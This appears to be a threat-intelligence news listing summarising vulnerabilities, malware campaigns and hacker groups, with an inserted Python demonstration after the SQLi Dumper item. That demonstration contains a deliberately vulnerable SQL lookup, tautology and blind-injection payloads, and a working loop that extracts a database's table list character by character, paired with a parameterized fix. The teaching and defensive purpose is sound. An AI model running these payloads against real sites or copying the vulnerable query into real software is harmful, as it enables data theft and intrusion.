Intelligence Reporting

All Articles (100)

Security researchers have disclosed 13 critical vulnerabilities, which they compared to Meltdown and Spectre, across AMD's Ryzen and EPYC processor lines. These vulnerabilities could allow attackers to access sensitive data, install backdoors or malware, and gain full control of affected systems. Unlike Meltdown and Spectre, exploiting them requires administrative access to the target machine, which narrows the realistic attack path to systems that are already compromised.
Cybercriminals in the Middle East/North Africa (MENA) region are among the most cooperative and united groups of hackers in the world when their goal is to attack the West. Hacktivists collaborate for financial and political gain, as well as out of religious conviction. Wapack Labs believes MENA bad actors will remain active and successful in cyber campaigns against the West until the West attains a better understanding of the region's languages, cultures, and religions.
Wapack Labs CTAC has exposed a large number of cyber events involving the oil-rich country of Kuwait and its oil and gas industry. Targets include a shipping company (merchantkuwait.com), a supplier to the oil and gas, petrochemical, marine, and other industries (globalvision-kw.com), and a regional Kuwaiti construction company serving the oil, education, and other sectors (cgc-kw.com). Further incidents discovered via CTAC are still being analyzed.
A Red Sky Alliance member reported a suspicious email to Wapack Labs for analysis. The email originated from the sender pvtromeo2007@aol.com with the subject line "Pvtromeo Notification N4821". The malicious email posed as a FedEx notification and attempted to get the user to click a malicious link.
A critical vulnerability has been discovered in the Credential Security Support Provider protocol (CredSSP) that affects all versions of Windows. Because CredSSP underpins authentication for RDP and WinRM, the flaw could allow remote attackers to abuse those services to steal data and run malicious code, taking control of the target's computer.
ROKRAT (also referred to as DOGcall) is a family of malware that has been used by attackers originating from North Korea.
A new Android malware, named "FakeApp", has been discovered that steals Facebook credentials, account details, usernames/passwords, and other information directly from victim devices. The malware mainly targets English-speaking users in Asia-Pacific countries and is distributed through third-party app stores.
A critical vulnerability has been discovered in Adobe Acrobat Reader DC. It is a stack-based buffer overflow that allows remote attackers to execute arbitrary code, and so take control of the victim's computer, if a vulnerable document is opened.
A Google security researcher discovered a serious remote code execution vulnerability in both the μTorrent desktop app for Windows and the newly launched "μTorrent Web", a version of the client that lets users download and stream torrents directly in their web browser.
Researchers have discovered a 0day vulnerability in Hewlett-Packard (HP) Project and Portfolio Management Center which could allow attackers to read sensitive files and data on the target system and to inject further malicious input. The researchers found an XML external entity (XXE) injection vulnerability in the way HP PPM processed import tickets.
AutoSploit attempts to automate the exploitation of remote hosts. Targets are collected automatically through the Shodan.io API: the user supplies a platform-specific search query (for example "Apache" or "IIS"), and the tool retrieves a list of candidate hosts to attack. This tool can be troublesome for networks that do not employ sound cyber security practices.
Bosnia and Herzegovina is a country in Southeastern Europe that was formerly part of Yugoslavia. Since the dissolution of Yugoslavia, Bosnia and Herzegovina has experienced infighting among ethnically and religiously motivated hacktivist groups, as well as commercially motivated hackers. Its cyber laws are not yet fully enacted, but the country cooperates fully in international efforts to fight cybercrime. Bosnian hackers use Bosnian, Serbian, German, English, and other languages to communicate. Due to recent…
A serious vulnerability has been identified in Skype that could allow attackers to gain full control of the target machine by granting system-level privileges to a local, unprivileged user.
On 08 February 2018, Wapack Labs discovered a user infected with the Azorult malware whose credentials for a major US city's procurement portal may have been compromised. Analysts identified the infected user through our keylogger collection project. The user's username and password were stolen when they signed on to the city's procurement portal, which permits contractors to enter bids on the government's requests for quotes (RFQ).
A vulnerability dubbed "Devil's Ivy" has been found in gSOAP, a code library widely used in physical security products. It could potentially allow attackers to fully disable or take over thousands of models of internet-connected devices, from security cameras to sensors and access-card readers.
In February 2018, Wapack Labs identified configurations for a Structured Query Language (SQL) injection tool showing attempted exploitation against the site for the 2018 Winter Olympic Games in PyeongChang, South Korea. A Wapack Labs analyst identified the tool as SQLi Dumper. Its developer, "c4rl0s" (for Carlos), states that the tool supports blind SQL injection, schema dumping, file dumping, MySQL brute forcing, and site scanning, and can submit recovered hashes to online cracking services. The attempted injection…
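To make concrete what "blind SQL injection" and "schema dumping" mean in the summary above, here is an added example for this page, not code from SQLi Dumper or from the Olympic site: a constructed SQLite database behind a lookup that builds its query by string formatting, a boolean-based blind extraction loop that recovers the table list one character at a time from the true/false difference in results, and the parameterized version of the same lookup against which the identical payloads fail. The table names and rows are invented for the demonstration.

```python
"""Blind SQL injection demonstration (added example; schema and data are constructed)."""
import sqlite3
from typing import Callable, List


def make_db() -> sqlite3.Connection:
    """Constructed sample database standing in for a public-facing site's backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE athletes (id INTEGER PRIMARY KEY, name TEXT, country TEXT);
        INSERT INTO athletes (name, country) VALUES
            ('A. Kim', 'KR'), ('B. Lee', 'KR'), ('C. Smith', 'US');
        CREATE TABLE admin_users (username TEXT, password_hash TEXT);
        INSERT INTO admin_users VALUES ('admin', 'c0ffee');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, country: str) -> List[str]:
    """Vulnerable: user input is pasted into the SQL text, so quotes, AND clauses
    and comment markers in the input become part of the query."""
    sql = "SELECT name FROM athletes WHERE country = '%s'" % country
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, country: str) -> List[str]:
    """Hardened: the same query with a bound parameter; the input is only ever a value."""
    sql = "SELECT name FROM athletes WHERE country = ?"
    return [row[0] for row in conn.execute(sql, (country,))]


def blind_extract(query: Callable[[str], list], expression: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction of the string produced by EXPRESSION.

    Each probe asks one yes/no question ("is character i equal to code N?") and
    reads the answer from whether the lookup still returns rows for 'KR'.
    The trailing '-- ' comments out the closing quote the application appends.
    """
    recovered = []
    for position in range(1, max_len + 1):
        # Stop once the string is shorter than the position being probed.
        if not query(f"KR' AND length(({expression})) >= {position} -- "):
            break
        for code in range(32, 127):  # printable ASCII
            probe = f"KR' AND unicode(substr(({expression}), {position}, 1)) = {code} -- "
            if query(probe):
                recovered.append(chr(code))
                break
    return "".join(recovered)


# Schema dump target: every table name, in a deterministic order.
TABLE_LIST_EXPR = (
    "SELECT group_concat(name) FROM "
    "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name)"
)


if __name__ == "__main__":
    db = make_db()
    print("normal:", lookup_vulnerable(db, "KR"))
    print("tautology:", lookup_vulnerable(db, "KR' OR '1'='1"))
    print("blind schema dump (vulnerable):",
          blind_extract(lambda p: lookup_vulnerable(db, p), TABLE_LIST_EXPR))
    print("blind schema dump (parameterized):",
          repr(blind_extract(lambda p: lookup_safe(db, p), TABLE_LIST_EXPR)))
```

Against the vulnerable lookup the tautology payload returns every athlete and the blind loop recovers the full table list without any query output ever being displayed, which is exactly the capability a tool like SQLi Dumper automates at scale. Against the parameterized lookup the same strings are treated as a literal country code, match nothing, and the extraction loop terminates on its first probe.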
A new malware has been discovered targeting institutions in the government, technology, education, and telecommunications sectors in Asian countries and in the US. The malware performs various tasks, including password stealing, bitcoin mining, and providing the attackers with complete remote access to compromised systems.